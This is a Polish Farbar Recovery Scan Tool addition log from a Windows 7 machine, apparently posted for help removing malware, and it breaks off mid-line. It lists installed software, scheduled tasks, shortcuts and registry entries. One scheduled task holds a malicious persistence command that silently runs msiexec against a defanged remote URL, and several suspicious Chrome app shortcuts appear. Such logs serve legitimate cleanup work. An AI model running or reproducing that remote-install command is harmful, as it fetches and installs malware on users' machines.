Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 20.12.2018 Uruchomiony przez pc (21-12-2018 11:03:53) Uruchomiony z C:\Users\pc\Desktop Windows 7 Home Premium Service Pack 1 (X64) (2018-09-09 17:26:20) Tryb startu: Safe Mode (with Networking) ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2258082688-2428047095-3221846902-500 - Administrator - Disabled) pc (S-1-5-21-2258082688-2428047095-3221846902-1000 - Administrator - Enabled) => C:\Users\pc Gość (S-1-5-21-2258082688-2428047095-3221846902-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-2258082688-2428047095-3221846902-1002 - Limited - Enabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) . . (HKLM\...\{5321B911-50E8-4F81-843D-B66E8938579C}) (Version: 7.1 - Intel) Hidden . . . (HKLM-x32\...\{FD87084D-762B-4B64-B34E-95FEA079327A}) (Version: 3.5.0.3 - Intel) Hidden Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 19.010.20064 - Adobe Systems Incorporated) Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.101 - Adobe Systems Incorporated) Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.101 - Adobe Systems Incorporated) AMD Catalyst Install Manager (HKLM\...\{8C1DA63E-3B80-46B5-64CC-8BE27A0C3FB4}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) Catalyst Control Center Next Localization BR (HKLM\...\{0AAE5E7A-2F6D-72D9-D0DF-80F194BD7A5A}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (HKLM\...\{0500A3FF-F5A1-3313-58CD-7DBC0126BDB0}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (HKLM\...\{2E866797-6A86-D485-08EE-7EDF2FF58758}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (HKLM\...\{F2691442-6098-2100-B54E-FA8B834E8437}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (HKLM\...\{8E8075B9-F175-9406-5CB6-D4E0DC559715}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (HKLM\...\{17DE6391-FC9A-FBC9-D7F6-733B5DC4610F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (HKLM\...\{6FF45160-0439-645E-8450-DD06558CED11}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (HKLM\...\{F3441830-D747-C1FA-1D64-5115FA200754}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (HKLM\...\{89434C70-A75C-8D5B-3E62-180F144E327E}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (HKLM\...\{B76DE8AB-9E9B-019B-4155-3426BD56DF3B}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (HKLM\...\{6611961A-B0E7-8CC0-B37D-B8427E4465CA}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (HKLM\...\{88FA6A6D-6441-A1E1-A318-7C78BFD42129}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (HKLM\...\{064C9A53-41BD-48A7-E6D6-B8B602DAD865}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (HKLM\...\{D8EEF488-861F-4A2D-6DF7-E5DD10409B75}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (HKLM\...\{8CE00A89-56EF-E816-E6BB-47AE6F88E395}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (HKLM\...\{D5A61AA0-63BB-CD18-03FC-603334B7E961}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (HKLM\...\{BA45B0B3-E1D3-E7A1-964C-D8F56A6451F2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (HKLM\...\{07F21799-880A-FFE0-7832-04B6E57877B3}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (HKLM\...\{AFE15987-06A8-175A-B04B-B883440C96CC}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (HKLM\...\{6304B126-A90A-AF9F-B474-7D964C38FA75}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden Core Temp 1.12.1 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.12.1 - ALCPU) CPUID HWMonitor 1.37 (HKLM\...\CPUID HWMonitor_is1) (Version: 1.37 - CPUID, Inc.) CrystalDiskInfo 8.0.0 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 8.0.0 - Crystal Dew World) Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 2018.11 - Emsisoft Ltd.) FileZilla Client 3.37.1 (HKLM-x32\...\FileZilla Client) (Version: 3.37.1 - Tim Kosse) FxSound Enhancer (HKLM-x32\...\DFX) (Version: 13.024.0.0 - FxSound) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden Intel(R) Computing Improvement Program (HKLM\...\{96FD0BEE-6848-48BB-AA99-A2033DB7F4E4}) (Version: 2.2.03942 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.7.0.1068 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4508 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 15.2.0.1020 - Intel Corporation) Intel(R) Trusted Connect Service Client x86 (HKLM-x32\...\{C9552825-7BF2-4344-BA91-D3CD46F4C441}) (Version: 1.49.166.0 - Intel Corporation) Hidden Intel(R) Trusted Connect Services Client (HKLM-x32\...\{df682aff-4294-4ad1-aaa7-276931d5781f}) (Version: 1.49.166.0 - Intel Corporation) Hidden Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 4.0.0.36 - Intel Corporation) Intel® Driver & Support Assistant (HKLM-x32\...\{3252578f-e595-4827-a6ed-0a278bbbdae8}) (Version: 3.5.0.3 - Intel) IP Camera Viewer 4 (HKLM-x32\...\IP Camera Viewer_is1) (Version: - DeskShare Inc.) Java 8 Update 191 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180191F0}) (Version: 8.0.1910.12 - Oracle Corporation) Killer Bandwidth Control Filter Driver (HKLM\...\{B5444A52-DE19-43CE-8553-5783C2BBB9E6}) (Version: 1.1.52.1451 - Rivet Networks) Hidden Killer E240x Drivers (HKLM\...\{7D0CDFB3-F8B2-40BE-B3AC-2A55632E6E66}) (Version: 1.1.52.1451 - Rivet Networks) Hidden Killer Network Manager (HKLM\...\{83824EED-EFC1-4EF3-A70B-EAA288F2D176}) (Version: 1.1.52.1451 - Rivet Networks) Hidden Killer Performance Suite (HKLM-x32\...\{55237225-2063-4B7D-81DF-5096D6696109}) (Version: 1.1.52.1451 - Qualcomm Atheros) Malwarebytes (wersja 3.6.1.2711) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes) Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation) Microsoft .NET Framework 4.7.2 (Polski) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.7.03062 - Microsoft Corporation) Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation) Mozilla Firefox 65.0 (x64 pl) (HKLM\...\Mozilla Firefox 65.0 (x64 pl)) (Version: 65.0 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 63.0 - Mozilla) Mozilla Thunderbird 60.3.3 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 60.3.3 (x86 pl)) (Version: 60.3.3 - Mozilla) MSI Afterburner 4.5.0 (HKLM-x32\...\Afterburner) (Version: 4.5.0 - MSI Co., LTD) NVIDIA PhysX (HKLM-x32\...\{54194F60-988C-4D03-B922-C2B00EFDA39A}) (Version: 9.10.0222 - NVIDIA Corporation) OCCT 4.5.1 (HKLM-x32\...\OCCT) (Version: 4.5.1 - Ocbase.com) OcxSetup version 1.0.5.4 (HKLM-x32\...\{B3696FEF-0B27-459F-A661-A4134B6A063E}_is1) (Version: 1.0.5.4 - ) ONVIF Device Manager v2.2.250 (HKLM-x32\...\{6AC771CF-4EAA-41B7-A398-61A33701E076}) (Version: 2.2.250 - Synesis) OpenOffice 4.1.5 (HKLM-x32\...\{7076105B-6FE8-464A-AC28-FFBB2686B68F}) (Version: 4.15.9789 - Apache Software Foundation) Oprogramowanie mikroukładu Intel® (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel(R) Corporation) Hidden Pale Moon 28.2.1 (x64 en-US) (HKLM\...\Pale Moon 28.2.1 (x64 en-US)) (Version: 28.2.1 - Moonchild Productions) PhotoFiltre 7 (HKU\S-1-5-21-2258082688-2428047095-3221846902-1000\...\PhotoFiltre 7) (Version: - ) PTZ Controller V3.2 (HKLM-x32\...\{4A179D3D-12F9-4BB3-A9B4-494E84215F84}) (Version: 1.0.0.0 - Serial Port Tool) RogueKiller version 13.0.17.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.0.17.0 - Adlice Software) Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH) Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 4.4.0 - Tweaking.com) VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN) Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0-2) (Version: 1.0.33.0 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0-3) (Version: 1.0.33.0 - LunarG, Inc.) WhoCrashed 6.01 (HKLM\...\WhoCrashed_is1) (Version: - Resplendence Software Projects Sp.) Winamp (HKLM-x32\...\Winamp) (Version: 5.8 - Winamp SA) Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation) WinRAR 5.60 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.60.0 - win.rar GmbH) wufuc (HKLM\...\{F7E7320E-9EBF-44C5-97E7-E8FEB7A47613}) (Version: 1.0.1.201 - zeffy) Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.5) (Version: 1.3.5 - Xvid Team) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-07-16] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-07-16] (Alexander Roshal) ContextMenuHandlers2-x32: [Emsisoft Shell Extension] -> {AB77609F-2178-4E6F-9C4B-44AC179D937A} => C:\Program Files\Emsisoft Anti-Malware\A2CONTMENU.DLL [2015-10-21] (Emsisoft Ltd) ContextMenuHandlers2-x32: [Emsisoft Shell Extension x64] -> {E3F21FC7-6D65-48E7-B62B-E9ED8200C764} => C:\Program Files\Emsisoft Anti-Malware\A2CONTMENU64.DLL [2015-10-21] (Emsisoft Ltd) ContextMenuHandlers3-x32: [Emsisoft Shell Extension] -> {AB77609F-2178-4E6F-9C4B-44AC179D937A} => C:\Program Files\Emsisoft Anti-Malware\A2CONTMENU.DLL [2015-10-21] (Emsisoft Ltd) ContextMenuHandlers3-x32: [Emsisoft Shell Extension x64] -> {E3F21FC7-6D65-48E7-B62B-E9ED8200C764} => C:\Program Files\Emsisoft Anti-Malware\A2CONTMENU64.DLL [2015-10-21] (Emsisoft Ltd) ContextMenuHandlers3-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes) ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2016-08-27] (Intel Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) ContextMenuHandlers6-x32: [Emsisoft Shell Extension] -> {AB77609F-2178-4E6F-9C4B-44AC179D937A} => C:\Program Files\Emsisoft Anti-Malware\A2CONTMENU.DLL [2015-10-21] (Emsisoft Ltd) ContextMenuHandlers6-x32: [Emsisoft Shell Extension x64] -> {E3F21FC7-6D65-48E7-B62B-E9ED8200C764} => C:\Program Files\Emsisoft Anti-Malware\A2CONTMENU64.DLL [2015-10-21] (Emsisoft Ltd) ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes) ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-07-16] (Alexander Roshal) ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-07-16] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {54931414-09A7-42B9-9C7D-A4C87522240B} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_101_pepper.exe [2018-12-09] (Adobe Systems Incorporated) Task: {5AC7B91B-379C-4B0A-96A9-4D34800D9EB1} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe Task: {742814C2-2CCC-4836-861E-C759FCB54658} - System32\Tasks\{7F7A6538-82DF-4181-A10F-F732B3E12396} => C:\Program Files (x86)\Ubisoft\The Settlers 7 - Droga do królestwa1\The Settlers7.exe Task: {80CF7655-9ECD-4BB9-BA6A-86093C39D72C} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_101_Plugin.exe [2018-12-16] (Adobe Systems Incorporated) Task: {81FE7175-84AC-4EC3-A193-BE691207220E} - System32\Tasks\{244EF55E-D569-E81D-0963-7EF90BE808AF} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/41S0FPai.jiX /q Task: {A2685FA2-BD66-447D-AC70-186FF0BE86CF} - System32\Tasks\IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon => C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe [2017-07-13] (Intel Corporation) Task: {C3F98DE7-42ED-40F0-AEA9-39ADCDCEAC4E} - System32\Tasks\wufuc.{72EEE38B-9997-42BD-85D3-2DD96DA17307} => "C:\Windows\system32\rundll32.exe" "C:\Program Files\wufuc\wufuc64.dll",RUNDLL32_Start Task: {CE0774A5-A576-4B5D-970A-D8FF5C5A01FF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-12] (Google Inc.) Task: {D4AB021C-33F9-4AD2-A3E2-3B9E46F63FBB} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-12-16] (Adobe Systems Incorporated) Task: {D4C53F15-81B5-451B-A44D-E7912FFEA4A4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-12] (Google Inc.) Task: {DC1EB9D0-8DF4-4700-8127-3174B64AD0B2} - System32\Tasks\IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 => C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe [2017-07-13] (Intel Corporation) Task: {DF7F80CC-59AF-4F21-BFC5-3C341A34D178} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\pc\Desktop\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\Desktop\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_pbdcmagkbhnjpjlnpibbmggikpedpilc\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\NACL Web Plug-in (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc ==================== Załadowane moduły (filtrowane) ============== 2018-12-21 10:21 - 2018-09-12 11:35 - 002701064 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll 2018-09-26 13:10 - 2018-09-26 13:10 - 000054440 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\Users\pc\Desktop\skan.jpeg:3or4kl4x13tuuug3Byamue2s4b [81] AlternateDataStreams: C:\Users\pc\Desktop\skan.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => 